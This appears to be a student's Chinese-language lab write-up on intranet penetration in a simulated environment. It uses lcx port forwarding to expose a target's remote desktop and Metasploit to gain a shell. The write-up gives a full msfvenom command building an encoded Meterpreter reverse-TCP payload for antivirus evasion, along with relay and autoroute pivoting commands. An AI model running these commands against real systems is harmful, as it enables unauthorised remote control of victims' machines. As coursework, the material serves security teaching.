一、实验目的
在学习并掌握metasploit工具的端口转发进行内网渗透,使用shell编码绕过检测以及了解端口转发原理和使用端口转发常用工具
二、实验内容
在实验模拟环境下对内网中的主机通过端口转发进行渗透,取得主机的shell。
三、实验步骤
- 查看目标机,攻击机,公网机器的ip地址以及账户
2.为了演示内网渗透需要使目标主机与攻击主机不能互相连接,在攻击主机执行下面的iptable配置命令使得目标主机与攻击主机不能相互连接。参数-I是表示Insert(添加),-D表示Delete(删除)。后面跟的是规则,INPUT表示入站,10.1.1.134是攻击主机的IP,DROP表示放弃连接。
iptables -I INPUT -s 10.1.1.134 -j DROP 屏蔽10.1.1.134主机
iptables –L 列出iptables的所有规则
3.攻击机与靶机之间不能够互相通信
4.靶机开启远程桌面
5.监听3300端口
在公网主机执行“lcx –listen tran_port copy_port”端口转发,tran_port为转发端口,copy_port为tran_port的映射端口。将lcx拷贝到桌面,cmd进入桌面,执行下列命令。
6.在靶机上执行
“lcx –slave attack_ip tran_port localhost_ip 3389”,attack_ip是攻击主机ip,tran_port是攻击主机监听的端口,localhost_ip是目标主机内网ip,3389是目标主机远程桌面使用的端口
7.在公网主机执行“lcx –listen tran_port copy_port”端口转发,tran_port为转发端口,copy_port为tran_port的映射端口。将lcx拷贝到桌面,cmd进入桌面,执行下列命令。
lcx -listen 1122 3300
8.打开远程桌面连接,输入本地回环地址和指定的端口号进行远程桌面连接操作
9.msf进行内网渗透,打开msf
10.使用exploit/multi/handler模块,设置攻击载荷和本地主机流量通过的端口号以及公网主机的ip地址作为RHOST
11.命令行中执行msfvenom命令制作一个能连接公网主机4000端口的反弹shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.143 LPORT=4000 -a x86 --platform windows -e x86/shikata_ga_nai -i 5 -f exe -o /root/payload.exe
12.攻击主机执行exploit命令后,将payload.exe拷贝到win2003主机并点击运行, 公网主机运行的lcx程序状态如下
13.攻击成功后显示:
14.获取uid
15.还可以为metasploit添加到内网的路由,然后进行内网扫描。添加到内网的路由后,metasploit可以访问目标主机内网中的任意一台主机。
run autoroute -s 10.1.1.134
四、实验小结
绑定shell与反弹shell的区别是什么?各自适合于怎样的应用场景?
绑定 Shell:
定义: 绑定 shell 是在目标系统上启动一个网络服务,并等待攻击者连接。一旦连接建立,攻击者就能够与目标系统进行交互。
应用场景: 适用于目标系统能够主动启动网络服务的情况,例如通过运行恶意程序或利用漏洞后,攻击者在目标系统上启动服务等待连接。
反弹 Shell:
定义: 反弹 shell 是攻击者在目标系统上执行恶意代码,使其成为一个网络服务,然后攻击者从远程位置连接到该服务,实现对目标系统的控制。
应用场景: 适用于目标系统能够执行外部命令的情况,例如攻击者成功注入代码或利用漏洞后,目标系统能够与攻击者的服务器建立连接。
选择使用场景:
绑定 Shell: 适用于目标系统能够主动启动网络服务,而攻击者需要等待连接的情况,比如目标系统中运行了一个可利用的漏洞。
反弹 Shell: 适用于攻击者能够在目标系统上执行代码,建立一个与攻击者控制服务器的连接,使得攻击者可以主动控制目标系统。
使用php语言编写一个端口转发的程序:
本地服务器: 运行这个 PHP 脚本的服务器(本地监听地址为 127.0.0.1,端口为 8888)。
目标服务器: 一个你想与之通信的目标服务器(目标地址为 目标IP,端口为 8080)。
运行此php脚本后,简单的场景模型如下:
客户端 <-> 本地服务器 <-> 目标服务器
标签:Metasploit,主机,tran,端口,目标,Win2003,实例,攻击者,port From: https://www.cnblogs.com/C418-minecraft/p/17789447.html